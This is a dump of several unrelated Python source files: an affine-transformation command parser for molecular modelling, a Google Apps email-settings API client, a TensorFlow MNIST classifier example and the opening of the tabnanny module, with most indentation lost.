# AffineCompose(Mtmp, M, Mdest)
# CopyMat(Mdest, Mtmp)
elif transform_str.find('move_rand(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[10:i_paren_close].split(',')
seed = 1
if len(args) in (2,4,7):
seed = int(args[0])
random.seed(seed)
if len(args) == 1:
                    sigma = float(args[0])
x = random.gauss(0.0, sigma)
y = random.gauss(0.0, sigma)
z = random.gauss(0.0, sigma)
elif len(args) == 2:
# seed = int(args[0]) this was already handled above
sigma = float(args[1])
x = random.gauss(0.0, sigma)
y = random.gauss(0.0, sigma)
z = random.gauss(0.0, sigma)
elif len(args) == 3:
x = random.gauss(0.0, float(args[0]))
y = random.gauss(0.0, float(args[1]))
z = random.gauss(0.0, float(args[2]))
elif len(args) == 4:
# seed = int(args[0]) this was already handled above
x = random.gauss(0.0, float(args[1]))
y = random.gauss(0.0, float(args[2]))
z = random.gauss(0.0, float(args[3]))
elif len(args) == 6:
x_min = float(args[0])
x_max = float(args[1])
y_min = float(args[2])
y_max = float(args[3])
z_min = float(args[4])
z_max = float(args[5])
                    # uniform in [min, max]
                    x = x_min + (x_max - x_min)*random.random()
                    y = y_min + (y_max - y_min)*random.random()
                    z = z_min + (z_max - z_min)*random.random()
elif len(args) == 7:
# seed = int(args[0]) this was already handled above
x_min = float(args[1])
x_max = float(args[2])
y_min = float(args[3])
y_max = float(args[4])
z_min = float(args[5])
z_max = float(args[6])
                    # uniform in [min, max]
                    x = x_min + (x_max - x_min)*random.random()
                    y = y_min + (y_max - y_min)*random.random()
                    z = z_min + (z_max - z_min)*random.random()
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 1, 2, 3, 4, 6 or 7 numerical arguments. Either:\n'
' move_rand(gauss_sigma) or\n'
' move_rand(seed, gauss_sigma) or\n'
' move_rand(gauss_sigma_x, gauss_sigma_y, gauss_sigma_z) or\n'
' move_rand(seed, gauss_sigma_x, gauss_sigma_y, gauss_sigma_z) or\n'
' move_rand(x_min, x_max, y_min, y_max, z_min, z_max) or\n'
' move_rand(seed, x_min, x_max, y_min, y_max, z_min, z_max)\n')
M = [[1.0, 0.0, 0.0, x],
[0.0, 1.0, 0.0, y],
[0.0, 0.0, 1.0, z]]
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('rot(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[4:i_paren_close].split(',')
center_v = None
if (len(args) == 7):
center_v = [float(args[4]), float(args[5]), float(args[6])]
elif (len(args) != 4):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 4 or 7 numerical arguments. Either:\n'
' rot(angle, axisX, axisY, axiZ) or \n'
' rot(angle, axisX, axisY, axiZ, centerX, centerY, centerZ)')
M[0][3] = 0.0 # RotMatAXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatAXYZ(M,
float(args[0]) * math.pi / 180.0,
float(args[1]),
float(args[2]),
float(args[3]))
if (center_v == None):
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
else:
# Move "center_v" to the origin
moveCentToOrig = [[1.0, 0.0, 0.0, -center_v[0]],
[0.0, 1.0, 0.0, -center_v[1]],
[0.0, 0.0, 1.0, -center_v[2]]]
AffineCompose(Mtmp, moveCentToOrig, Mdest)
CopyMat(Mdest, Mtmp)
# Rotate the coordinates (relative to the origin)
AffineCompose(Mtmp, M, Mdest) # M is the rotation matrix
CopyMat(Mdest, Mtmp)
# Move the origin back to center_v
moveCentBack = [[1.0, 0.0, 0.0, center_v[0]],
[0.0, 1.0, 0.0, center_v[1]],
[0.0, 0.0, 1.0, center_v[2]]]
AffineCompose(Mtmp, moveCentBack, Mdest)
CopyMat(Mdest, Mtmp)
# # elif transform_str.find('rotcm(') == 0:
# # assert(xcm != None)
# # i_paren_close = transform_str.find(')')
# # if i_paren_close == -1:
# # i_paren_close = len(transform_str)
# # args = transform_str[6:i_paren_close].split(',')
# # if (len(args) != 4):
# # raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# # ' Invalid command: \"'+transform_str+'\"\n'
# # ' This command requires 4 numerical arguments.')
# #
# # moveCMtoOrig = [[1.0, 0.0, 0.0, -xcm[0]],
# # [0.0, 1.0, 0.0, -xcm[1]],
# # [0.0, 0.0, 1.0, -xcm[2]]]
# # AffineCompose(Mtmp, moveCMtoOrig, Mdest)
# # CopyMat(Mdest, Mtmp)
# # M[0][3] = 0.0#RotMatAXYZ() only modifies 3x3 submatrix of M
# # M[1][3] = 0.0#The remaining final column must be zeroed by hand
# # M[2][3] = 0.0
# # RotMatAXYZ(M,
# # float(args[0])*math.pi/180.0,
# # float(args[1]),
# # float(args[2]),
# # float(args[3]))
# # AffineCompose(Mtmp, M, Mdest)
# # CopyMat(Mdest, Mtmp)
# # moveCmBack = [[1.0, 0.0, 0.0, xcm[0]],
# # [0.0, 1.0, 0.0, xcm[1]],
# # [0.0, 0.0, 1.0, xcm[2]]]
# # AffineCompose(Mtmp, moveCmBack, Mdest)
# # CopyMat(Mdest, Mtmp)
elif transform_str.find('rot_rand(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[9:i_paren_close].split(',')
seed = 1
if len(args) in (2,6):
seed = int(args[0])
random.seed(seed)
raxis = [0.0, 0.0, 0.0]
if len(args) < 5:
# choose a random rotation axis
raxis_len = 0.0
while (not ((0.01<raxis_len) and (raxis_len <= 1.0))):
                        raxis = [2.0*random.random() - 1.0 for d in range(0,3)]
raxis_len = math.sqrt(raxis[0]**2 + raxis[1]**2 + raxis[2]**2)
for d in range(0,3):
raxis[d] /= raxis_len
                if len(args) == 0:
                    angle_min = 0.0
                    angle_max = 2*math.pi
                elif len(args) == 1:
                    angle_min = 0.0
                    angle_max = float(args[0]) * math.pi / 180.0
                elif len(args) == 2:
                    # seed = int(args[0]) this was already handled above
                    angle_min = 0.0
                    angle_max = float(args[1]) * math.pi / 180.0
                elif len(args) == 5:
                    # angles are given in degrees, as in rot()
                    angle_min = float(args[0]) * math.pi / 180.0
                    angle_max = float(args[1]) * math.pi / 180.0
                    raxis[0] = float(args[2])
                    raxis[1] = float(args[3])
                    raxis[2] = float(args[4])
                elif len(args) == 6:
                    # seed = int(args[0]) this was already handled above
                    angle_min = float(args[1]) * math.pi / 180.0
                    angle_max = float(args[2]) * math.pi / 180.0
                    raxis[0] = float(args[3])
                    raxis[1] = float(args[4])
                    raxis[2] = float(args[5])
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 0, 1, 2, 5 or 6 numerical arguments. Either:\n'
' rot_rand() or \n'
' rot_rand(delta_angle) or \n'
' rot_rand(seed, delta_angle) or \n'
' rot_rand(angle_min, angle_max, axisX, axisY, axiZ) or\n'
' rot_rand(seed, angle_min, angle_max, axisX, axisY, axiZ)')
                angle = angle_min + (angle_max - angle_min)*random.random()
M[0][3] = 0.0 # RotMatAXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatAXYZ(M,
angle,
raxis[0], raxis[1], raxis[2])
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('rotvv(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[6:i_paren_close].split(',')
center_v = None
if (len(args) == 9):
center_v = [float(args[6]), float(args[7]), float(args[8])]
elif (len(args) != 6):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 6 or 9 numerical arguments. Either:\n'
' rotvv(Xold,Yold,Zold,Xnew,Ynew,Znew) or \n'
' rotvv(Xold,Yold,Zold,Xnew,Ynew,Znew,centerX,centerY,centerZ)')
M[0][3] = 0.0 # RotMatXYZXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatXYZXYZ(M,
float(args[0]),
float(args[1]),
float(args[2]),
float(args[3]),
float(args[4]),
float(args[5]))
if (center_v == None):
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
else:
# Move "center_v" to the origin
moveCentToOrig = [[1.0, 0.0, 0.0, -center_v[0]],
[0.0, 1.0, 0.0, -center_v[1]],
[0.0, 0.0, 1.0, -center_v[2]]]
AffineCompose(Mtmp, moveCentToOrig, Mdest)
CopyMat(Mdest, Mtmp)
# Rotate the coordinates (relative to the origin)
AffineCompose(Mtmp, M, Mdest) # M is the rotation matrix
CopyMat(Mdest, Mtmp)
# Move the origin back to center_v
moveCentBack = [[1.0, 0.0, 0.0, center_v[0]],
[0.0, 1.0, 0.0, center_v[1]],
[0.0, 0.0, 1.0, center_v[2]]]
AffineCompose(Mtmp, moveCentBack, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('scale(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[6:i_paren_close].split(',')
if (len(args) == 1):
scale_v = [float(args[0]), float(args[0]), float(args[0])]
center_v = [0.0, 0.0, 0.0]
elif (len(args) == 3):
scale_v = [float(args[0]), float(args[1]), float(args[2])]
center_v = [0.0, 0.0, 0.0]
elif (len(args) == 4):
scale_v = [float(args[0]), float(args[0]), float(args[0])]
center_v = [float(args[1]), float(args[2]), float(args[3])]
elif (len(args) == 6):
scale_v = [float(args[0]), float(args[1]), float(args[2])]
center_v = [float(args[3]), float(args[4]), float(args[5])]
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 1, 3, 4, or 6 numerical arguments. Either:\n'
' scale(ratio), or \n'
' scale(ratioX, ratioY, ratioZ),\n'
' scale(ratio, centerX, centerY, centerZ), or\n'
' scale(ratioX, ratioY, ratioZ, centerX, centerY, centerZ)')
ScaleMat(M, scale_v)
# Now worry about translation:
for d in range(0, 3):
M[d][3] = center_v[d] * (1.0 - scale_v[d])
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
# # elif transform_str.find('scalecm(') == 0:
# # assert(xcm != None)
# # i_paren_close = transform_str.find(')')
# # if i_paren_close == -1:
# # i_paren_close = len(transform_str)
# # args = transform_str[8:i_paren_close].split(',')
# #
# # moveCMtoOrig = [[1.0, 0.0, 0.0, -xcm[0]],
# # [0.0, 1.0, 0.0, -xcm[1]],
# # [0.0, 0.0, 1.0, -xcm[2]]]
# # AffineCompose(Mtmp, moveCMtoOrig, Mdest)
# # CopyMat(Mdest, Mtmp)
# #
# # M[0][3] = 0.0 #ScaleMat() only modifies 3x3 submatrix of M
# # M[1][3] = 0.0 #The remaining final column must be zeroed by hand
# # M[2][3] = 0.0
# # if (len(args) == 1):
# # ScaleMat(M, args[0])
# # elif (len(args) == 3):
# # ScaleMat(M, args)
# # else:
# # raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# # ' Invalid command: \"'+transform_str+'\"\n'
# # ' This command requires either 1 or 3 numerical arguments.')
# #
# # AffineCompose(Mtmp, M, Mdest)
# # CopyMat(Mdest, Mtmp)
# # moveCmBack = [[1.0, 0.0, 0.0, xcm[0]],
# # [0.0, 1.0, 0.0, xcm[1]],
# # [0.0, 0.0, 1.0, xcm[2]]]
# # AffineCompose(Mtmp, moveCmBack, Mdest)
# # CopyMat(Mdest, Mtmp)
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Unknown transformation command: \"' + transform_str + '\"\n')
return Mdest
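# Usage sketch for AffineStack (editor's illustration; the command-string
# syntax is the one parsed by CommandsToMatrix above):
#
#   stack = AffineStack()
#   stack.PushCommandsRight('move(1,0,0).rot(90,0,0,1)')
#   xyz = [0.0, 0.0, 0.0]
#   AffineTransform(xyz, stack.M, [1.0, 0.0, 0.0])
#   # xyz is now approximately [0.0, 2.0, 0.0]: the point is first moved
#   # to (2,0,0), then rotated 90 degrees about the z axis.
#   stack.Pop()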
class MultiAffineStack(object):
def __init__(self, which_stack=None):
self.tot_stack = None
self.stack_lookup = None
self.stack_keys = None
self.stacks = None
self.M = None
self.error_if_substack_empty = False
self.Clear()
def Clear(self):
self.tot_stack = AffineStack()
self.stack_lookup = {}
self.stack_keys = deque([])
self.stacks = deque([])
self.M = self.tot_stack.M
self.error_if_substack_empty = False
def _Update(self):
self.tot_stack.Clear()
self.M = self.tot_stack.M
assert(len(self.stacks) > 0)
for stack in self.stacks:
self.tot_stack.PushRight(stack.M)
def PushStack(self, which_stack):
stack = AffineStack()
self.stack_keys.append(which_stack)
self.stack_lookup[which_stack] = stack
self.stacks.append(stack)
self.tot_stack.PushRight(stack.M)
def PopStack(self):
assert(len(self.stacks) > 0)
self.tot_stack.PopRight()
which_stack = self.stack_keys.pop()
del self.stack_lookup[which_stack]
self.stacks.pop()
def Push(self, M, which_stack=None, right_not_left=True):
if len(self.stacks) == 0:
self.PushStack(which_stack)
if which_stack == None:
stack = self.stacks[-1]
if right_not_left:
# This should copy the matrix M into stack.M
stack.PushRight(M)
else:
stack.PushLeft(M)
else:
stack = self.stack_lookup[which_stack]
if right_not_left:
stack.PushRight(M)
else:
stack.PushLeft(M)
if stack == self.stacks[-1]:
self.tot_stack.PopRight() # Replace the last matrix on self.tot_stack
# Note: Always use tot_stack.PopRight (even if
# right_not_left=False)
                self.tot_stack.PushRight(stack.M) # with the updated version.
# Note: We could call self._Update(M) here, but that is slower.
else:
self._Update()
def PushRight(self, M, which_stack=None):
self.Push(M, which_stack, right_not_left=True)
def PushLeft(self, M, which_stack=None):
self.Push(M, which_stack, right_not_left=False)
def PushCommandsRight(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None,
which_stack=None): # position of center of object
"""Generate affine transformation matrices from simple text commands
(such as \"rotcm(90,0,0,1)\" and \"move(0,5.0,0)".
Chains of "rotcm", "movecm", "rot", and "move" commands
can also be strung together:
\"rotcm(90,0,0,1).move(0,5.0,0)\"
Commands ending in \"cm\" are carried out relative to center-of-mass
(average position) of the object, and consequently require
an additional argument (\"xcm\").
"""
self.PushRight(AffineStack.CommandsToMatrix(text, src_loc, xcm),
which_stack)
def PushCommandsLeft(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None, # position of center of object
which_stack=None):
self.PushLeft(AffineStack.CommandsToMatrix(text, src_loc, xcm),
which_stack)
def Pop(self, which_stack=None, right_not_left=True):
#empty_stack_error = False
if which_stack == None:
stack = self.stacks[-1]
if len(stack) >= 1:
if right_not_left:
stack.PopRight()
else:
stack.PopLeft()
# Note: We could call self._Update(M) here, but that is slower
self.tot_stack.PopRight() # Replace the last matrix on self.tot_stack
# Note: Always use tot_stack.PopRight (even if
# right_not_left=False)
                # with the updated version.
self.tot_stack.PushRight(stack.M)
else:
assert(False)
# OPTIONAL CODE BELOW AUTOMATICALLY INVOKES self.PopStack() WHEN
# THE stacks[-1].stack IS EMPTY. PROBABLY DOES NOT WORK. IGNORE
# if (not self.error_if_substack_empty):
# if right_not_left:
# assert(len(self.stacks) > 0)
# self.PopStack()
# else:
# assert(False)
# else:
# empty_stack_error = True
else:
stack = self.stack_lookup[which_stack]
if len(stack) > 1:
if right_not_left:
stack.PopRight()
else:
stack.PopLeft()
self._Update()
else:
assert(False)
#empty_stack_error = True
def PopRight(self, which_stack=None):
self.Pop(which_stack, right_not_left=True)
def PopLeft(self, which_stack=None):
        self.Pop(which_stack, right_not_left=False)
def ScaleMat(dest, scale):
for i in range(0, len(dest)):
for j in range(0, len(dest[i])):
dest[i][j] = 0.0
if ((type(scale) is float) or (type(scale) is int)):
for i in range(0, len(dest)):
dest[i][i] = scale
else:
for i in range(0, len(dest)):
dest[i][i] = scale[i]
def RotMatAXYZ(dest, angle, axis_x, axis_y, axis_z):
r = math.sqrt(axis_x * axis_x + axis_y * axis_y + axis_z * axis_z)
X = 1.0
Y = 0.0
Z = 0.0
if r > 0.0: # check for non-sensical input
X = axis_x / r
Y = axis_y / r
Z = axis_z / r
else:
angle = 0.0
# angle *= math.pi/180.0 # "angle" is assumed to be in degrees
# on second thought, let the caller worry about angle units.
c = math.cos(angle)
s = math.sin(angle)
dest[0][0] = X * X * (1 - c) + c
dest[1][1] = Y * Y * (1 - c) + c
dest[2][2] = Z * Z * (1 - c) + c
dest[0][1] = X * Y * (1 - c) - Z * s
dest[0][2] = X * Z * (1 - c) + Y * s
dest[1][0] = Y * X * (1 - c) + Z * s
dest[2][0] = Z * X * (1 - c) - Y * s
dest[1][2] = Y * Z * (1 - c) - X * s
dest[2][1] = Z * Y * (1 - c) + X * s
# formula from these sources:
# http://inside.mines.edu/~gmurray/ArbitraryAxisRotation/
# also check
# http://www.manpagez.com/man/3/glRotate/
# some pdb test commands:
# from lttree_matrixstack import *
# r = [[1.0,0.0,0.0], [0.0,1.0,0.0], [0.0,0.0,1.0]]
# RotMatAXYZ(r, 90.0, 0.0, 0.0, 1.0)
def CrossProd(dest, A, B):
dest[0] = (A[1] * B[2] - B[1] * A[2])
dest[1] = (A[2] * B[0] - B[2] * A[0])
dest[2] = (A[0] * B[1] - B[0] * A[1])
def DotProd(A, B):
c = 0.0
for d in range(0, len(A)):
c += A[d] * B[d]
return c
def Length(A):
L = 0.0
for x in A:
L += x * x
return math.sqrt(L)
def Normalize(dest, source):
assert(len(dest) == len(source))
L = Length(source)
for d in range(0, len(source)):
dest[d] = source[d] / L
def RotMatXYZXYZ(dest,
xold, yold, zold,
xnew, ynew, znew):
A = [xold, yold, zold]
B = [xnew, ynew, znew]
axis = [0.0, 0.0, 0.0]
CrossProd(axis, A, B)
La = Length(A)
Lb = Length(B)
Lc = Length(axis)
sinAng = Lc / (La * Lb)
cosAng = DotProd(A, B) / (La * Lb)
if Lc > 0.0:
Normalize(axis, axis)
angle = math.atan2(sinAng, cosAng)
else:
axis = [1.0, 0.0, 0.0]
angle = 0.0
RotMatAXYZ(dest, angle, axis[0], axis[1], axis[2])
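# Sanity sketch (editor's illustration): rotating the x axis onto the y axis
# is a 90-degree rotation about z, so (1,0,0) must land on (0,1,0).
#
#   M = [[0.0]*3 for i in range(3)]
#   RotMatXYZXYZ(M, 1.0, 0.0, 0.0, 0.0, 1.0, 0.0)
#   v = [0.0, 0.0, 0.0]
#   LinTransform(v, M, [1.0, 0.0, 0.0])   # v is now approximately [0, 1, 0]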
| gpl-3.0 |
ehashman/oh-mainline | vendor/packages/gdata/src/gdata/apps/emailsettings/service.py | 95 | 8939 | #!/usr/bin/python
#
# Copyright (C) 2008 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Allow Google Apps domain administrators to set users' email settings.
EmailSettingsService: Set various email settings.
"""
__author__ = 'google-apps-apis@googlegroups.com'
import gdata.apps
import gdata.apps.service
import gdata.service
API_VER='2.0'
# Forwarding and POP3 options
KEEP='KEEP'
ARCHIVE='ARCHIVE'
DELETE='DELETE'
ALL_MAIL='ALL_MAIL'
MAIL_FROM_NOW_ON='MAIL_FROM_NOW_ON'
class EmailSettingsService(gdata.apps.service.PropertyService):
"""Client for the Google Apps Email Settings service."""
def _serviceUrl(self, setting_id, username, domain=None):
if domain is None:
domain = self.domain
return '/a/feeds/emailsettings/%s/%s/%s/%s' % (API_VER, domain, username,
setting_id)
def CreateLabel(self, username, label):
"""Create a label.
Args:
username: User to create label for.
label: Label to create.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('label', username)
properties = {'label': label}
return self._PostProperties(uri, properties)
def CreateFilter(self, username, from_=None, to=None, subject=None,
has_the_word=None, does_not_have_the_word=None,
has_attachment=None, label=None, should_mark_as_read=None,
should_archive=None):
"""Create a filter.
Args:
username: User to create filter for.
from_: Filter from string.
to: Filter to string.
subject: Filter subject.
has_the_word: Words to filter in.
does_not_have_the_word: Words to filter out.
has_attachment: Boolean for message having attachment.
label: Label to apply.
should_mark_as_read: Boolean for marking message as read.
should_archive: Boolean for archiving message.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('filter', username)
properties = {}
properties['from'] = from_
properties['to'] = to
properties['subject'] = subject
properties['hasTheWord'] = has_the_word
properties['doesNotHaveTheWord'] = does_not_have_the_word
properties['hasAttachment'] = gdata.apps.service._bool2str(has_attachment)
properties['label'] = label
properties['shouldMarkAsRead'] = gdata.apps.service._bool2str(should_mark_as_read)
properties['shouldArchive'] = gdata.apps.service._bool2str(should_archive)
return self._PostProperties(uri, properties)
def CreateSendAsAlias(self, username, name, address, reply_to=None,
make_default=None):
"""Create alias to send mail as.
Args:
username: User to create alias for.
name: Name of alias.
address: Email address to send from.
reply_to: Email address to reply to.
make_default: Boolean for whether this is the new default sending alias.
Returns:
A dict containing the result of the create operation.
"""
uri = self._serviceUrl('sendas', username)
properties = {}
properties['name'] = name
properties['address'] = address
properties['replyTo'] = reply_to
properties['makeDefault'] = gdata.apps.service._bool2str(make_default)
return self._PostProperties(uri, properties)
def UpdateWebClipSettings(self, username, enable):
"""Update WebClip Settings
Args:
username: User to update forwarding for.
enable: Boolean whether to enable Web Clip.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('webclip', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
return self._PutProperties(uri, properties)
def UpdateForwarding(self, username, enable, forward_to=None, action=None):
"""Update forwarding settings.
Args:
username: User to update forwarding for.
enable: Boolean whether to enable this forwarding rule.
forward_to: Email address to forward to.
action: Action to take after forwarding.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('forwarding', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['forwardTo'] = forward_to
properties['action'] = action
return self._PutProperties(uri, properties)
def UpdatePop(self, username, enable, enable_for=None, action=None):
"""Update POP3 settings.
Args:
username: User to update POP3 settings for.
enable: Boolean whether to enable POP3.
enable_for: Which messages to make available via POP3.
action: Action to take after user retrieves email via POP3.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('pop', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['enableFor'] = enable_for
properties['action'] = action
return self._PutProperties(uri, properties)
def UpdateImap(self, username, enable):
"""Update IMAP settings.
Args:
username: User to update IMAP settings for.
enable: Boolean whether to enable IMAP.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('imap', username)
properties = {'enable': gdata.apps.service._bool2str(enable)}
return self._PutProperties(uri, properties)
def UpdateVacation(self, username, enable, subject=None, message=None,
contacts_only=None):
"""Update vacation settings.
Args:
username: User to update vacation settings for.
enable: Boolean whether to enable vacation responses.
subject: Vacation message subject.
message: Vacation message body.
contacts_only: Boolean whether to send message only to contacts.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('vacation', username)
properties = {}
properties['enable'] = gdata.apps.service._bool2str(enable)
if enable is True:
properties['subject'] = subject
properties['message'] = message
properties['contactsOnly'] = gdata.apps.service._bool2str(contacts_only)
return self._PutProperties(uri, properties)
def UpdateSignature(self, username, signature):
"""Update signature.
Args:
username: User to update signature for.
signature: Signature string.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('signature', username)
properties = {'signature': signature}
return self._PutProperties(uri, properties)
def UpdateLanguage(self, username, language):
"""Update user interface language.
Args:
username: User to update language for.
language: Language code.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('language', username)
properties = {'language': language}
return self._PutProperties(uri, properties)
def UpdateGeneral(self, username, page_size=None, shortcuts=None, arrows=None,
snippets=None, unicode=None):
"""Update general settings.
Args:
username: User to update general settings for.
page_size: Number of messages to show.
shortcuts: Boolean whether shortcuts are enabled.
arrows: Boolean whether arrows are enabled.
snippets: Boolean whether snippets are enabled.
      unicode: Whether unicode is enabled.
Returns:
A dict containing the result of the update operation.
"""
uri = self._serviceUrl('general', username)
properties = {}
if page_size != None:
properties['pageSize'] = str(page_size)
if shortcuts != None:
properties['shortcuts'] = gdata.apps.service._bool2str(shortcuts)
if arrows != None:
properties['arrows'] = gdata.apps.service._bool2str(arrows)
if snippets != None:
properties['snippets'] = gdata.apps.service._bool2str(snippets)
if unicode != None:
properties['unicode'] = gdata.apps.service._bool2str(unicode)
return self._PutProperties(uri, properties)
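# Usage sketch (editor's illustration; the domain, admin credentials and
# username below are placeholders, and authentication details depend on the
# deployment):
#
#   service = EmailSettingsService(email='admin@example.com',
#                                  password='secret',
#                                  domain='example.com')
#   service.ProgrammaticLogin()
#   service.UpdateImap('jdoe', enable=True)
#   service.CreateLabel('jdoe', 'Receipts')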
| agpl-3.0 |
HKUST-SING/tensorflow | tensorflow/examples/learn/mnist.py | 45 | 3999 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This showcases how simple it is to build image classification networks.
It follows description from this TensorFlow tutorial:
https://www.tensorflow.org/versions/master/tutorials/mnist/pros/index.html#deep-mnist-for-experts
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from sklearn import metrics
import tensorflow as tf
layers = tf.contrib.layers
learn = tf.contrib.learn
def max_pool_2x2(tensor_in):
return tf.nn.max_pool(
tensor_in, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def conv_model(feature, target, mode):
"""2-layer convolution model."""
# Convert the target to a one-hot tensor of shape (batch_size, 10) and
  # with an on-value of 1 for each one-hot vector of length 10.
target = tf.one_hot(tf.cast(target, tf.int32), 10, 1, 0)
# Reshape feature to 4d tensor with 2nd and 3rd dimensions being
  # image width and height, final dimension being the number of color channels.
feature = tf.reshape(feature, [-1, 28, 28, 1])
# First conv layer will compute 32 features for each 5x5 patch
with tf.variable_scope('conv_layer1'):
h_conv1 = layers.convolution2d(
feature, 32, kernel_size=[5, 5], activation_fn=tf.nn.relu)
h_pool1 = max_pool_2x2(h_conv1)
# Second conv layer will compute 64 features for each 5x5 patch.
with tf.variable_scope('conv_layer2'):
h_conv2 = layers.convolution2d(
h_pool1, 64, kernel_size=[5, 5], activation_fn=tf.nn.relu)
h_pool2 = max_pool_2x2(h_conv2)
# reshape tensor into a batch of vectors
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
# Densely connected layer with 1024 neurons.
h_fc1 = layers.dropout(
layers.fully_connected(
h_pool2_flat, 1024, activation_fn=tf.nn.relu),
keep_prob=0.5,
is_training=mode == tf.contrib.learn.ModeKeys.TRAIN)
# Compute logits (1 per class) and compute loss.
logits = layers.fully_connected(h_fc1, 10, activation_fn=None)
loss = tf.losses.softmax_cross_entropy(target, logits)
# Create a tensor for training op.
train_op = layers.optimize_loss(
loss,
tf.contrib.framework.get_global_step(),
optimizer='SGD',
learning_rate=0.001)
return tf.argmax(logits, 1), loss, train_op
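# Shape walk-through of conv_model (derived from the code above):
#   input [batch, 28, 28, 1] -> conv1 + pool -> [batch, 14, 14, 32]
#   -> conv2 + pool -> [batch, 7, 7, 64] -> flatten -> [batch, 7*7*64]
#   -> dense 1024 (+ dropout) -> logits [batch, 10]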
def main(unused_args):
### Download and load MNIST dataset.
mnist = learn.datasets.load_dataset('mnist')
### Linear classifier.
feature_columns = learn.infer_real_valued_columns_from_input(
mnist.train.images)
classifier = learn.LinearClassifier(
feature_columns=feature_columns, n_classes=10)
classifier.fit(mnist.train.images,
mnist.train.labels.astype(np.int32),
batch_size=100,
steps=1000)
score = metrics.accuracy_score(mnist.test.labels,
list(classifier.predict(mnist.test.images)))
print('Accuracy: {0:f}'.format(score))
### Convolutional network
classifier = learn.Estimator(model_fn=conv_model)
classifier.fit(mnist.train.images,
mnist.train.labels,
batch_size=100,
steps=20000)
score = metrics.accuracy_score(mnist.test.labels,
list(classifier.predict(mnist.test.images)))
print('Accuracy: {0:f}'.format(score))
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
shiblon/pytour | static/js/pypyjs/pypy-nojit.js-0.3.1/lib/modules/tabnanny.py | 394 | 11336 | #! /usr/bin/env python
"""The Tab Nanny despises ambiguous indentation. She knows no mercy.
tabnanny -- Detection of ambiguous indentation
For the time being this module is intended to be called as a script.
However it is possible to import it into an IDE and use the function
check() described below.
Warning: The API provided by this module is likely to change in future
releases; such changes may not be backward compatible.
"""
# Released to the public domain, by Tim Peters, 15 April 1998.
# XXX Note: this is now a standard library module.
# XXX The API needs to undergo changes however; the current code is too
# XXX script-like. This will be addressed later.
__version__ = "6"
import os
import sys
import getopt
import tokenize
